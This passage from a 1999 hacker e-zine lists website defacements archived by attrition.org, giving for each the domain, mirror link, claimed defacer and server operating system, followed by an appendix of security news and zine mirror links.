http://www.attrition.org/mirror/attrition/1999/11/17/www.mcdonalds.com.au Defaced by: globher Operating System: Windows NT Defaced domain: www.webspawn.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.webspawn.com Operating System: BSDI Defaced domain: redskin.dap.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/redskin.dap.ch Defaced by: Sesame Street Hax0rz Operating System: Red Hat Linux Defaced domain: www.cvm.tamu.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.cvm.tamu.edu Defaced by: sSh Operating System: Windows NTY Defaced domain: www.aceralliance.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.aceralliance.com Defaced by: Sesame Street Hax0rz Operating System: Windows NT Defaced domain: www.phe.queensu.ca Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.phe.queensu.ca Operating System: Linux Defaced domain: www.phoenixcomms.com.sg Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.phoenixcomms.com.sg Defaced by: un33k t3ch Operating System: Windows NT (IIS/3.0) Defaced domain: www.chicks.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.chicks.net Defaced by: unknown Operating System: Linux (Red Hat) (Apache 1.3.9) Defaced domain: www.dcrt.nih.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.dcrt.nih.gov Defaced by: h2Vk Operating System: Windows NT (IIS/4.0) Defaced domain: www.dcrt.nih.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.dcrt.nih.gov Defaced by: h2Vk Operating System: Windows NT (IIS/4.0) Defaced domain: www.aar.tc.faa.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.aar.tc.faa.gov Defaced by: sSh Operating System: Windows NT (IIS/4.0) Defaced domain: www.ohio.doe.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.ohio.doe.gov Defaced by: hV2k Operating System: Windows NT (IIS/4.0) Defaced domain: www.gc.doe.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.gc.doe.gov Defaced by: h2Vk Operating System: Windows NT (IIS/4.0) Defaced domain: www.gc.doe.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.gc.doe.gov Defaced by: globher Operating System: Windows NT Defaced domain: www.igrejauniversal.com.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.igrejauniversal.com.br Defaced by: Maverick Operating System: Linux Defaced domain: abacus.mc.duke.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/abacus.mc.duke.edu Defaced by: Verb0 Operating System: Windows NT Defaced domain: www.oarhq.noaa.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.oarhq.noaa.gov Defaced by: Sesame Street Hax0rz Operating System: Windows NT Defaced domain: www.monica-lewinsky.org (yeah yet again) Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.monica-lewinsky.org Defaced by: ne0h Operating System: BSDI Defaced domain: www.theblue.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.theblue.net Defaced by: knell Operating System: Linux Defaced domain: www.fesp.rj.gov.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.fesp.rj.gov.br Defaced by: p4riah Operating System: WIndows NT Defaced domain: www.waterworld.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.waterworld.com Defaced by: p4riah Operating System: Windows NT Defaced domain: seb.ce.gatech.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/seb.ce.gatech.edu Defaced by: spinkus Operating System: Solaris Defaced domain: assinet.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/assinet.com Defaced by: twd Operating System: Windows NT Defaced domain: www.svic.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.svic.net Defaced by: twd Operating System: Windows NT Defaced domain: stinkdog.bidmc.harvard.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/stinkdog.bidmc.harvard.edu Operating System: Red Hat Linux Defaced domain: www.congruentsoft.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.congruentsoft.com Defaced by: twd Operating System: Windows NT (IIS/4.0) Defaced domain: netcommerce.com.sg Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/netcommerce.com.sg Defaced by: twd Operating System: Windows NT (IIS/4.0) Defaced domain: www.spykee.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.spykee.com Operating System: OpenBSD 2.4 (Apache 1.3.9) Defaced domain: www.ssp.df.gov.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.ssp.df.gov.br Defaced by: JLM Operating System: Windows NT (IIS/4.0) Defaced domain: www.firebat.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.firebat.net Defaced by: Sabu and Six Operating System: Windows NT (IIS/4.0) Defaced domain: www.muis.gov.sg Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.muis.gov.sg Defaced by: Sarin Operating System: Windows NT (IIS/4.0) Defaced domain: registry.faa.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/registry.faa.gov Defaced by: sSh Operating System: Windows NT (IIS/4.0) Defaced domain: atsy2k.faa.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/atsy2k.faa.gov Defaced by: sSh Operating System: Windows NT (IIS/4.0) Defaced domain: www.teamdawghouse.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.teamdawghouse.com Defaced by: Sabu Operating System: Linux (Apache 1.3.4) Defaced domain: www.learncomm.org Site Title: Kiel Woodward Associates Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.learncomm.org Defaced by: ieet Operating System: Irix (Rapidsite/Apa-1.3.4) Defaced domain: www.ssp.df.gov.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.ssp.df.gov.br Defaced by: Fuby Operating System: Windows NT (IIS/4.0) Defaced domain: www.facsfinancial.com Site Title: Facs Financial Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.facsfinancial.com Defaced by: sSh Operating System: Windows NT (IIS/4.0) Defaced domain: www.whiterules.com Site Title: White Rules Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.whiterules.com Defaced by: TWHA Operating System: Linux (Apache 1.3.3) Defaced domain: www.hawgparts.com Site Title: P and S Inc Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.hawgparts.com Defaced by: Devil-C Operating System: FreeBSD 2.2.1 - 3.0 (Apache 1.2.6) There are hidden comments in the HTML. Defaced domain: www.sect.mg.gov.br Site Title: Secretaria de Estado de CiËncia e Tecnologia de Minas Gerais Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.sect.mg.gov.br Defaced by: globher Operating System: Windows NT (IIS/4.0) Defaced domain: www.senado-ba.gov.ar Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.senado-ba.gov.ar Defaced by: c0rvus Operating System: Windows NT (IIS/4.0) Defaced domain: www.citizens-bank-nm.com Site Title: Citizens Bank Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.citizens-bank-nm.com Operating System: Windows NT (IIS/4.0) Defaced domain: www.moscow-bank.ru Site Title: Moscow Bank Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.moscow-bank.ru Defaced by: dukj Operating System: Windows NT (IIS/4.0) Defaced domain: www.pobis.net Site Title: ASIA INFORMATION NETWORK Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.pobis.net Defaced by: Darkness Operating System: Linux (Apache 1.1.1) Defaced domain: wayland.k12.mi.us Site Title: Wayland K12 School (MI) Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/wayland.k12.mi.us Defaced by: Darkness Operating System: Red Hat Linux (Apache 1.3.6) Defaced domain: www.caloritec.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.caloritec.ch Defaced by: xhostile & acidklown Operating System: Windows NT (Elogia Web Server/1.0) Defaced domain: www.markowitzmail.com Site Title: Markowitz Mall Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.markowitzmail.com Defaced by: sSh Operating System: Red Hat Linux (Apache 1.3.6) Defaced domain: www.pathword.com Site Title: Roger Solioz (PATHWORD-DOM) Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.pathword.com Defaced by: xhostile & acidklown Operating System: Windows NT (Elogia Web Server/1.0) Defaced domain: www.cornu.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.cornu.ch Defaced by: xhostile & acidklown Operating System: Windows NT (Elogia Web Server/1.0) Defaced domain: www.moneytopics.com Site Title: IPM Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.moneytopics.com Defaced by: xhostile & acidklown Operating System: Windows NT (Elogia Web Server/1.0) Defaced domain: www.techtravel.ch Site Title: Tech Travel (CH) Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.techtravel.ch Defaced by: xhostile & acidklown Operating System: Windows NT (Elogia Web Server/1.0) Defaced domain: www.socialinfo.ch Site Title: Social Info (CH) Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.socialinfo.ch Defaced by: xhostile & acidklown Operating System: Windows NT (Elogia Web Server/1.0) Defaced domain: www.duqpart.com Site Title: Duquette & Partners, Inc. Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.duqpart.com Defaced by: sSh Operating System: Linux (Apache 1.3.4) Defaced domain: www.focal.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.focal.ch Defaced by: xhostile & acidklown Operating System: Windows NT (Elogia Web Server/1.0) Defaced domain: www.fullfat.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.fullfat. Defaced by: xhostile & acidklown Operating System: Windows NT (Elogia Web Server 1.0) domain: www.fifo.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.fifo.ch Defaced by: xhostile & acidklown Operating System: Windows NT (Elogia Web Server/1.0) Defaced domain: www.cybergribouille.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.cybergribouille.ch Defaced by: acidklown Operating System: Windows NT (Elogia Web Server 1.0) Defaced domain: www.wnym.com Site Title: Western New York Microcomputer, Inc. Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.wnym.com Defaced by: sSh Operating System: Linux (Apache 1.3.4) Defaced domain: www.ultramongolia.com Site Title: UltraMongolia Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.ultramongolia.com Defaced by: xhostile & acidklown Operating System: Windows NT (Elogia Web Server 1.0) Defaced domain: www.swisscentershanghai.com Site Title: SINOPTIC Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.swisscentershanghai.com Defaced by: acidklown Operating System: Windows NT (Elogia Web Server 1.0) Defaced domain: dogwizard.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/dogwizard.com Defaced by: CodeZero Operating System: Linux (Apache 1.3.6) There are hidden comments in the HTML. Defaced domain: www.sinoptic.ch Site Title: Sinoptic Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.sinoptic.ch Defaced by: acidklown Operating System: Windows NT (Elogia Web Server 1.0) Defaced domain: www.medtechnet.com Site Title: Med TechNet Online Information Services Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.medtechnet.com Defaced by: sSh Operating System: Linux (Apache 1.3.4) Defaced domain: www.siavd.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.siavd.ch Defaced by: acidklown Operating System: Windows NT (Elogia Web Server 1.0) Defaced domain: www.digitoner.ch Site Title: DigiToner (CH) Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.digitoner.ch Defaced by: acidklown Operating System: Windows NT (Elogia Web Server 1.0) Defaced domain: www.ipem.mg.gov.br Site Title: Instituto de Pesos e Medidas do Estado de Minas Gerais Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.ipem.mg.gov.br Defaced by: globher Operating System: Windows NT (IIS/4.0) Defaced domain: www.guixe.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.guixe.com Defaced by: acidklown Operating System: Windows NT (Elogia Web Server 1.0) Defaced domain: www.iug.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.iug.ch Defaced by: acidklown Operating System: Windows NT (Elogia Web Server 1.0) Defaced domain: www.sis-china.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.sis-china.ch Defaced by: acidklown Operating System: Windows NT (Elogia Web Server 1.0) Defaced domain: www.reymondsa.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.reymondsa.ch Defaced by: acidklown Operating System: Windows NT (Elogia Web Server 1.0) Defaced domain: www.centovisi.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.centovisi.ch Defaced by: acidklown Operating System: Windows NT (Elogia Web Server 1.0) Defaced domain: meetingout.senate.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/meetingout.senate.gov Defaced by: sSh Operating System: NT Defaced domain: wsg6.ngdc.noaa.gov Site Title: National Oceanic and Atmospheric Administration Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/wsg6.ngdc.noaa.gov Defaced by: Spykee Operating System: Red Hat Linux (Apache 1.3.6) Defaced domain: www.csc-ing.com Site Title: Computer Sciences Corporation Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.csc-ing.com Defaced by: dagger Operating System: Windows NT (IIS/4.0) Defaced domain: crack.neurobio.ucla.edu Site Title: University of California, Los Angeles Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/crack.neurobio.ucla.edu Defaced by: spykee Operating System: Red Hat Linux (Apache 1.3.3) Defaced domain: bing.ngdc.noaa.gov Site Title: National Oceanic and Atmospheric Administration Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/bing.ngdc.noaa.gov Defaced by: Spykee Operating System: Red Hat Linux (Apache 1.3.6) Defaced domain: www.jrtc-polk.army.mil Site Title: Joint Readiness Training Centre & Fort Polk Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.jrtc-polk.army.mil Defaced by: Pakistan Hackerz Club Operating System: Windows NT Defaced domain: www.comunidadebr.com.br Site Title: Comunidade Brazil Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.comunidadebr.com.br Defaced by: globher Operating System: Windows NT Defaced domain: wwwnhc.nhmccd.cc.tx.us Site Title: North Harris College Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/wwwnhc.nhmccd.cc.tx.us Defaced by: sect0r Operating System: Windows NT Defaced domain: www.lic.gov.uk Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.lic.gov.uk Defaced by: Kryptek Operating System: Solaris (Apache 1.2.4) Defaced domain: gw.fresno.gov Site Title: City of Fresno Gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/gw.fresno.gov Defaced by: globher Operating System: Windows NT (IIS/4.0) URL: www.brick.net Defaced domain: www.brick.net Site Title: Loopback Inc Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.brick.net Defaced by: cesar Operating System: BSDI 3.0 (Apache 1.3.9) URL: www.afree.net Defaced domain: www.afree.net Site Title: A Free Net Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.afree.net Operating System: BSDI 3.0 (Apache 1.3.9) URL: intra-cas.faa.gov Defaced domain: intra-cas.faa.gov Site Title: Federal Aviation Administration Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/intra-cas.faa.gov Defaced by: ytcracker Operating System: Windows NT (IIS/4.0) URL: smagazine.simplenet.com Defaced domain: smagazine.simplenet.com Site Title: Simple Network Communications Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/smagazine.simplenet.com Operating System: Solaris (Apache 1.3.9) URL: www.nekipo.ee Defaced domain: www.nekipo.ee Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.nekipo.ee Defaced by: verb0 Operating System: Windows NT (IIS/4.0) URL: www.andmevara.ee Defaced domain: www.andmevara.ee Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.andmevara Defaced by: verb0 Operating System: Windows NT (IIS/4.0) URL: bin.mis.bolton.ac.uk Defaced domain: bin.mis.bolton.ac.uk Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/bin.mis.bolton.ac.uk Defaced by: s-n1nja Operating System: Apache 1.2.5 URL: www.anzwers.net Defaced domain: www.anzwers.net Site Title: Mythos Srl Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.anzwers.net Defaced by: HiP Operating System: Linux (Apache 1.3.6) URL: www.agmkt.state.ny.us Defaced domain: www.agmkt.state.ny.us Site Title: State of New York Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.agmkt.state.ny.us Defaced by: ytcracker Operating System: Windows NT (IIS/4.0) Mass Hack: URL: dongabank.co.kr Defaced domain: dongabank.co.kr Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/dongabank.co.kr Defaced by: cybernetix Operating System: Linux (Apache 1.3.9) Attrition comment: 53 other .kr domains defaced with this one URL: www.windesheim.nl Defaced domain: www.windesheim.nl Site Title: Windenheim Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.windesheim.nl Defaced by: phr0st Operating System: Windows NT (IIS/4.0) Defaced domain: www.sst.nrel.gov Site Title: National Renewable Energy Laboratory Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.sst.nrel.gov Defaced by: globher Operating System: Windows NT (IIS/4.0) Defaced domain: www.wines.shopwithme.com Site Title: Shop With Me - Wines Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.wines.shopwithme.com Defaced by: DHC Operating System: BSDI 3.0 (Apache 1.2.6) Defaced domain: www.ipsm.gov.br Site Title: Instituto de PrevidËncia dos Servidores Militares do Estado de Minas Gerais Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.ipsm.gov.br Defaced by: globher Operating System: Windows NT (IIS/3.0) Defaced domain: gw.fresno.gov Site Title: City of Fresno Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/gw.fresno.gov Defaced by: globher Operating System: NT Defaced domain: www.natall.com Site Title: National Alliance Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.natall.com Defaced by: phr0st Operating System: Windows NT (IIS/3.0) Defaced domain: www.eseqex.ensino.eb.br Site Title: Escola de EquitaÚÇo do ExÊrcito Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.eseqex.ensino.eb.br Defaced by: globher Operating System: Windows NT (IIS/4.0) Defaced domain: www.ccb.state.or.us Site Title: State of Oregon Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.ccb.state.or.us Defaced by: ytcracker Operating System: Windows NT (IIS/4.0) Defaced domain: da_itc.da.gov.ph Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/da_itc.da.gov.ph Defaced by: TREATY Operating System: AIX 4.2 (Apache 1.2.4) Defaced domain: www.brasemb.or.jp Site Title: Embassy of Brazil in Tokyo Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.brasemb.or.jp Defaced by: globher Operating System: Windows NT Defaced domain: testwww.sos.state.ga.us Site Title: Georgia Secretary of State Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/testwww.sos.state.ga.us Defaced by: secto0r Operating System: Windows NT Defaced domain: www.occs.state.or.us Site Title: Oregon State Board of Education Office of Community College Services Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.occs.state.or.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: mhs.pembrokeshire.ac.uk Site Title: Pembrokeshire College Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/mhs.pembrokeshire.ac.uk Defaced by: TREATY Operating System: Solaris Defaced domain: www.tingiris.com Site Title: Steve Tingiris Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.tingiris.com Defaced by: vs Operating System: Linux Defaced domain: www.cherokee.k12.ga.us Site Title: Cherokee County School System Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.cherokee.k12.ga.us Defaced by: secto0r Operating System: Windows NT Defaced domain: beta.lamison.com Site Title: The Lamison Press Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/beta.lamison.com Defaced by: darkness Operating System: Linux Defaced domain: www.coweta.k12.ga.us Site Title: Coweta County School System Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.coweta.k12.ga.us Defaced by: secto0r Operating System: Windows NT Defaced domain: www.superstition.com Site Title: www.superstition.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.superstition.com Defaced by: TREATY Operating System: NT Defaced domain: www.ncc.gov.ph Site Title: Philippine National Computer Center Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.ncc.gov.ph Defaced by: TREATY Defaced domain: www.melissa.com Site Title: Melissa Computer Systems Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.melissa.com Defaced by: c0de red Operating System: Solaris Defaced domain: www.hwa.net Site Title: Hoefer WYSOCKI Architects Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.hwa.net Defaced by: p4riah Operating System: Windows NT Defaced domain: branson.k12.co.us Site Title: Branson School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/branson.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: avboces.k12.co.us Site Title: AV BOCES Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/avboces.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: centennial.k12.co.us Site Title: Centennial School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/centennial.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: mail.heidmar.net Site Title: Heidenreich Marine Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/mail.heidmar.net Defaced by: ieet Operating System: Windows NT Defaced domain: hoehne.k12.co.us Site Title: Hoene School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/hoehne.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: fowler.k12.co.us Site Title: Fowler School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/fowler.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: kim.k12.co.us Site Title: Kim School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/kim.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: huerfano.k12.co.us Site Title: Huerfano School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/huerfano.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: bee.d93.k12.id.us Site Title: District 93 Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/bee.d93.k12.id.us Defaced by: TREATY Operating System: Linux Defaced domain: lasanimas.k12.co.us Site Title: Lasanimas School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/lasanimas.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: lamar.k12.co.us Site Title: Lamar School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/lamar.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: manzanola.k12.co.us Site Title: Manzanola School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/manzanola.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: laveta.k12.co.us Site Title: Laveta School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/laveta.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: mcclave.k12.co.us Site Title: McClave School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/mcclave.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: www.dodge.k12.ga.us Site Title: Dodge School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.dodge.k12.ga.us Defaced by: secto0r Operating System: Windows NT Defaced domain: primero.k12.co.us Site Title: Primero School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/primero.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: plainview.k12.co.us Site Title: Plainview School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/plainview.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: www.essex.ensino.eb.br Site Title: Essex Escola de Saude do Exercito Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.essex.ensino.eb.br Defaced by: globher Operating System: Windows NT Defaced domain: www.cis.pvt.k12.ca.us Site Title: Childrens International School Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.cis.pvt.k12.ca.us Defaced by: Nitr0BurN Operating System: Linux Defaced domain: www.coweta.k12.ga.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.coweta.k12.ga.us Defaced by: v00d00 Operating System: Windows NT (IIS/4.0) Defaced domain: www.pm.sc.gov.br Site Title: PolÎcia Militar de Santa Catarina - PMSC Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.pm.sc.gov.br Defaced by: globher Operating System: Apache 1.3.3 Defaced domain: www.srcs.k12.ca.us Site Title: K12 CA Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.srcs.k12.ca.us Defaced by: Darkness Operating System: Windows NT (IIS/4.0) Defaced domain: www.gibsonconsulting.com (Someone hacked a Gibson!) =) Site Title: Gibson & Associates, Inc. Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.gibsonconsulting.com Defaced by: twd Operating System: Windows NT (IIS/4.0) Defaced domain: saude.sc.gov.br Site Title: secretaria de saude de santa catarina Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/saude.sc.gov.br Defaced by: JLM Operating System: Windows NT (IIS/3.0) Defaced domain: bcmsc.k12.mi.us Site Title: K12 MI Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/bcmsc.k12.mi.us Defaced by: sSh Operating System: Windows NT (IIS/4.0) Defaced domain: www.foreigntrade.gov.tr Site Title: Foreign Trade Turkey Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.foreigntrade.gov.tr Defaced by: twd Operating System: Windows NT (IIS/4.0) Defaced domain: www.mipsor.state.mi.us Site Title: Michigan Public Sexual Offender Query Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.mipsor.state.mi.us Defaced by: ieet Operating System: Windows NT (IIS/4.0) Defaced domain: www.familychildcare.org Site Title: Florida Family Child Care Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.familychildcare.org Defaced by: sSh Operating System: Linux (Apache 1.3.9) Attrition comment: Geniuses left off a > tag in TITLE. View source. Defaced domain: www.cybermoon.net Site Title: Cybermoon Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.cybermoon.net Defaced by: zeroc Operating System: Linux (Apache 1.3.6) Defaced domain: www.scrf.gov.ru Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.scrf.gov.ru Defaced by: ieet Operating System: Windows NT (IIS/4.0) Defaced domain: support.gbcprotech.com Site Title: GBC Protech Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/support.gbcprotech.com Defaced by: sSh Operating System: Red Hat Linux (Apache 1.3.6) and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ HWA.hax0r.news Mirror Sites around the world: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW ** http://net-security.org/hwahaxornews ** NEW ** http://www.sysbreakers.com/hwa ** NEW ** http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW ** http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa.*DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwa.hax0r.news.8m.com/ http://www.fortunecity.com/skyscraper/feature/103/ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://securax.org/cum/ *New address* Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Canada .......: http://www.hackcanada.com Croatia.......: http://security.monitor.hr Columbia......: http://www.cascabel.8m.com http://www.intrusos.cjb.net Finland ........http://hackunlimited.com/ Germany ........http://www.alldas.de/ http://www.security-news.com/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ http://hackerlink.or.id/ Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Singapore.....: http://www.icepoint.com South Africa ...http://www.hackers.co.za http://www.hack.co.za http://www.posthuman.za.net Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. .za (South Africa) sites contributed by wyzwun tnx guy... Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- 